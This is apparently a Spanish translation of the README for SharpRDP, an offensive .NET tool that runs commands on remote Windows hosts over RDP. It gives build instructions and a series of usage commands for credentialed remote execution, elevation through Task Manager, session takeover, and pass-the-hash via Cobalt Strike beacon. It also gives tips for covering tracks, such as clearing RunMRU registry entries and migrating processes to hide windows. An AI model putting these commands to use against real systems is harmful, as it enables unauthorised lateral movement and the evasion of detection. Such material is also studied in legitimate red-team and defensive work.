
Aplicación de Consola .NET del Protocolo de Escritorio Remoto para Ejecución Autenticada de Comandos
Para compilar, abra el proyecto en Visual Studio y compile para Release. Se generarán dos DLL en el directorio Release, pero no las necesita porque las DLL están incluidas en el ensamblado.
Si no desea usar las DLL proporcionadas, necesitará el SDK de .NET para crear la DLL AxMSTSCLib.dll. Para crearla, deberá ejecutar aximp desde el SDK sobre mstscax.dll. %<SDK dir>%\aximp.exe %windir%\system32\mstscax.dll. Esas DLL deberán ser referenciadas por el proyecto para que se creen las DLL de Interop.
También necesitará comprimir las DLL con Deflate y nombrarlas AxInterop.MSTSCLib.dll.bin e Interop.MSTSCLib.dll.bin
Conexión y ejecución RDP normal
SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password
Ejecutar programa como proceso hijo de cmd o powershell
SharpRDP.exe computername=target.domain command="C:\Temp\file.exe" username=domain\user password=password exec=cmd
Usar modo administrador restringido
SharpRDP.exe computername=target.domain command="C:\Temp\file.exe"
Conectar unidades del primer host
SharpRDP.exe computername=domain.target command="\\tsclient\C\Temp\file.exe" username=domain\user password=password connectdrive=true
Ejecutar comando elevado mediante el diálogo Ejecutar - ACTUALMENTE CON ERRORES
SharpRDP.exe computername=domain.target command="C:\Temp\file.exe" username=domain\user password=password elevated=winr
Ejecutar comando elevado mediante el administrador de tareas
SharpRDP.exe computername=domain.target command="C:\Temp\file.exe\" username=domain\user password=password elevated=taskmgr
Agregar autenticación a nivel de red
SharpRDP.exe computername=domain.target command="C:\Temp\file.exe\" username=domain\user password=password nla=true
Solicitar tomar el control de la sesión de inicio
SharpRDP.exe computername=domain.target command="C:\Temp\file.exe\" username=domain\user password=password takeover=true
Si el modo administrador restringido está habilitado en el destino, no especifique credenciales y usará el contexto del usuario actual. Puede usar PTH o make_token en beacon o runas /netonly en un sistema Windows.
Toda la ejecución comienza con el diálogo Ejecutar de Windows (Win+R). Se creará una clave de registro en HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU con el comando que ejecutó. Si desea eliminarla, puede usar: CleanRunMRU: Obtener o limpiar valores RunMRU
Tenga en cuenta que si ejecuta un programa como msbuild (estoy seguro de que hay otros), aparecerá una ventana de cmd mientras el proceso se ejecuta. Si lo hace, probablemente sea mejor migrar el proceso y eliminar el original.
Las DLL necesarias están compiladas en el ensamblado y se utiliza el evento de resolución de dominio de aplicación. Debido al tamaño de las DLL, se comprimen y descomprimen en tiempo de ejecución (para cumplir con el límite de tamaño de 1 MB de beacon).
Blog al respecto encontrado aquí SharpRDP
También parte de MoveKit